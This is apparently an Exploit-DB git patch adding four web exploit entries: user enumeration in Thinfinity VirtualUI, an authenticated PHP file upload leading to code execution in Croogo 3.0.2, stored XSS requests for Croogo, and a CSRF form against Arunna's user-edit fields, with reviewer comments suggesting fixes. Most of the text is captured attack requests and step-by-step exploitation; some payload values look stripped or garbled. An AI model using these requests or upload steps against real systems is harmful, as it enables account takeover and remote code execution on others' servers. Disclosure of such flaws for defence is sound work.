From 929e2549452fb71fcd442b0964dd7221c31177d1 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 17 Dec 2021 05:01:54 +0000
Subject: [PATCH] DB: 2021-12-17

4 changes to exploits/shellcodes

Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
Croogo 3.0.2 - Unrestricted File Upload
Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
---
 exploits/multiple/webapps/50601.txt | 12 +++
 exploits/php/webapps/50602.txt | 61 ++++++++++++++
 exploits/php/webapps/50603.txt | 124 ++++++++++++++++++++++++++++
 exploits/php/webapps/50608.html | 35 ++++++++
 files_exploits.csv | 4 +
 5 files changed, 236 insertions(+)
 create mode 100644 exploits/multiple/webapps/50601.txt
 create mode 100644 exploits/php/webapps/50602.txt
 create mode 100644 exploits/php/webapps/50603.txt
 create mode 100644 exploits/php/webapps/50608.html

diff --git a/exploits/multiple/webapps/50601.txt b/exploits/multiple/webapps/50601.txt
new file mode 100644
index 000000000..f06810fdb
--- /dev/null
+++ b/exploits/multiple/webapps/50601.txt
@@ -0,0 +1,12 @@
+# Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
+# Date: 13/12/2021
+# Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed
+# Vendor Homepage: https://www.cybelesoft.com
+# Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
+# Version: vulnerable < v3.0
+# Tested on: Microsoft Windows
+# CVE: CVE-2021-44848
+
+How it works: By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest...
+Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME" where "USERNAME" need to be brute-forced.
+Reference: https://github.com/cybelesoft/virtualui/issues/1
\ No newline at end of file
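Review bot: The `# Version:` header (`vulnerable < v3.0`) and the title (`2.5.41.0`) disagree on what is affected, and only the title's build is carried into the files_exploits.csv row, so anyone searching the index sees a single tested version rather than the range; suggest `# Version: 2.5.41.0 (tested); all releases before 3.0 reported affected`. The advisory names the oracle (a username-dependent message from `/changePassword`) but gives no remediation, which is the part a defender needs; a line such as `# Fix/workaround: return an identical response for known and unknown usernames on changePassword; rate-limit and log the endpoint` would make the issue actionable and makes the enumeration visible in logs as bursts of `changePassword?username=` requests carrying distinct names. Minor wording: `"USERNAME" need to be brute-forced` should read `needs to be`.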
diff --git a/exploits/php/webapps/50602.txt b/exploits/php/webapps/50602.txt
new file mode 100644
index 000000000..b2773e098
--- /dev/null
+++ b/exploits/php/webapps/50602.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Croogo 3.0.2 - Unrestricted File Upload
+# Date: 06/12/2021
+# Exploit Author: Enes Özeser
+# Vendor Homepage: https://croogo.org/
+# Software Link: https://downloads.croogo.org/v3.0.2.zip
+# Version: 3.0.2
+# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
+
+==> 'setting-43' Unrestricted File Upload <==
+
+1- Login with your privileged account.
+2- Click on the 'Settings' section.
+3- Go to the 'Themes'. Directory is '/admin/settings/settings/prefix/Theme'
+4- Choose a malicious php script and upload it.
+5- Go to the '/uploads/(NAME).php' directory. You must change 'NAME' parameter with your filename you uploaded.
+6- The malicious PHP script will be executed.
+
+POST /admin/settings/settings/prefix/Theme HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127
+Content-Length: 970
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/admin/settings/settings/prefix/Theme
+Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------360738881613175158033315978127
+Content-Disposition: form-data; name="_method"
+
+POST
+-----------------------------360738881613175158033315978127
+Content-Disposition: form-data; name="_csrfToken"
+
+c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
+-----------------------------360738881613175158033315978127
+Content-Disposition: form-data; name="setting-43"; filename="malicious.php"
+Content-Type: application/octet-stream
+
+$command";
+?>
+
+-----------------------------360738881613175158033315978127
+Content-Disposition: form-data; name="_Token[fields]"
+
+c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A
+-----------------------------360738881613175158033315978127
+Content-Disposition: form-data; name="_Token[unlocked]"
+
+
+-----------------------------360738881613175158033315978127--
\ No newline at end of file
diff --git a/exploits/php/webapps/50603.txt b/exploits/php/webapps/50603.txt
new file mode 100644
index 000000000..b60d7f034
--- /dev/null
+++ b/exploits/php/webapps/50603.txt
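Review bot: The title omits the precondition the steps themselves state (`1- Login with your privileged account.`): the upload is reachable only from an authenticated admin session, so the entry should carry the `(Authenticated)` qualifier the index already uses for comparable entries (e.g. the `meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)` row in files_exploits.csv); the same applies to 50603, whose four requests all go to `/admin/` routes with the same session cookie. The `Cookie`, `_csrfToken`, `_Token[fields]` and `Content-Length` values in the captured request are per-session and per-install (the `_Token[fields]` hash is, as far as I recall, tied to the session and the exact field set), and `setting-43` is the id of the theme setting on the author's install, so the request cannot be replayed verbatim; a header line such as `# NOTE: replace the csrfToken/CAKEPHP cookie, _csrfToken, _Token[fields] and the setting-NN id with values from your own admin session` would stop readers from filing the PoC as broken. The advisory would also be more useful to defenders with the root cause and fix stated: steps 4–6 imply the Theme setting accepts a `.php` upload and stores it under the web-served `/uploads/` path, so the remediation is an extension/MIME allow-list on that setting and serving `/uploads/` with script execution disabled.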
@@ -0,0 +1,124 @@
+# Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
+# Date: 06/12/2021
+# Exploit Author: Enes Özeser
+# Vendor Homepage: https://croogo.org/
+# Software Link: https://downloads.croogo.org/v3.0.2.zip
+# Version: 3.0.2
+# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
+
+==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==
+
+POST /admin/file-manager/attachments/add HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730
+Content-Length: 923
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/admin/file-manager/attachments/add
+Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------114221148012003093972656004730
+Content-Disposition: form-data; name="_method"
+
+POST
+-----------------------------114221148012003093972656004730
+Content-Disposition: form-data; name="_csrfToken"
+
+c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
+-----------------------------114221148012003093972656004730
+Content-Disposition: form-data; name="file"; filename="file.txt"
+Content-Type:
+
+Enes Ozeser (@enesozeser)
+-----------------------------114221148012003093972656004730
+Content-Disposition: form-data; name="_Token[fields]"
+
+16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
+-----------------------------114221148012003093972656004730
+Content-Disposition: form-data; name="_Token[unlocked]"
+
+
+-----------------------------114221148012003093972656004730--
+
+
+==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==
+
+POST /admin/taxonomy/types/edit/5 HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 590
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)admin/taxonomy/types/edit/5
+Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
+title=&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&
+comment_approve=1&comment_spam_protection=0&comment_captcha=0¶ms=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&
+format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply
+
+
+==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==
+
+POST /admin/blocks/regions/edit/3 HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 336
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/admin/blocks/regions/edit/3
+Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
+title=&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply
+
+
+==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==
+
+POST /admin/file-manager/attachments/edit/20 HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 363
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/admin/file-manager/attachments/edit/20
+Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
+title=&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply
\ No newline at end of file
diff --git a/exploits/php/webapps/50608.html b/exploits/php/webapps/50608.html
new file mode 100644
index 000000000..2b309cd1a
--- /dev/null
+++ b/exploits/php/webapps/50608.html
@@ -0,0 +1,35 @@
+# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
+# Date: November 29, 2021
+# Exploit Author: =(L_L)=
+# Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/
+# Vendor Homepage: https://github.com/arunna
+# Software Link: https://github.com/arunna/arunna
+# Version: 1.0.0
+# Tested on: Ubuntu 20.04.2 LTS
+
+
+
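Review bot: The taxonomy request's `Referer: http://(HOST)admin/taxonomy/types/edit/5` is missing the slash after `(HOST)` that every other request in the file has; it should be `Referer: http://(HOST)/admin/taxonomy/types/edit/5`. All three form-encoded bodies show `title=` with an empty value and the attachment upload shows a bare `Content-Type:` header, so as rendered here none of the four requests carries a visible injection value; if the committed file is also empty there, each section should say what goes in that field (a placeholder such as `title=<PAYLOAD>` — constructed example — is enough), and if the values were lost in this rendering the file is fine as is. `¶ms=routes=true` in the taxonomy body reads as `&params=routes=true` with `&para` collapsed into `¶`, which looks like an entity-rendering artifact of this page rather than of the file, but is worth checking before the request is reused. The sinks all sit behind `/admin/` under the same admin session, so this is admin-to-admin stored XSS; the fix on the application side is output encoding of `title` and of the stored attachment content type wherever the admin views print them.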
+ + + + + + + + + + + + + + + + + + + + +
username[0]
select[0]
first_name[0]
last_name[0]
display_name[0]
one_liner[0]
location[0]
sex[0]
birthday[0]
birthmonth[0]
birthyear[0]
bio[0]
expertise[0][]
tags[0]
skills[0]
email[0]
website[0]
password[0]
re_password[0]
user_type[0]
status[0]
save_changes
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0e6463d7d..6637ea361 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44684,3 +44684,7 @@ id,file,description,date,author,type,platform,port
 50595,exploits/hardware/webapps/50595.txt,"Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
 50596,exploits/php/webapps/50596.txt,"meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,LiquidWorm,webapps,php,
 50597,exploits/php/webapps/50597.txt,"Online Thesis Archiving System 1.0 - SQLi Authentication Bypass",1970-01-01,"Yehia Elghaly",webapps,php,
+50601,exploits/multiple/webapps/50601.txt,"Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration",1970-01-01,"Daniel Morales",webapps,multiple,
+50602,exploits/php/webapps/50602.txt,"Croogo 3.0.2 - Unrestricted File Upload",1970-01-01,"Enes Özeser",webapps,php,
+50603,exploits/php/webapps/50603.txt,"Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Enes Özeser",webapps,php,
+50608,exploits/php/webapps/50608.html,"Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,=(L_L)=,webapps,php,
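Review bot: Only the form field names survive in this rendering (whatever markup surrounds them is not shown), so the target endpoint and request method of the PoC cannot be checked from the page; if the committed file does not name them in its header, a line such as `# Target: <user-edit endpoint — fill in> (POST)` would let a reader relate the PoC to the linked write-up without running it. The field set includes `password[0]`, `re_password[0]`, `user_type[0]` and `status[0]`, so a successful forged submission changes credentials and role — account takeover rather than a cosmetic profile edit — and the header's impact should say so rather than just `'Multiple' CSRF`. On the application side the fix is a per-session anti-CSRF token validated on that form plus a `SameSite` attribute on the session cookie, with an `Origin`/`Referer` check as defence in depth.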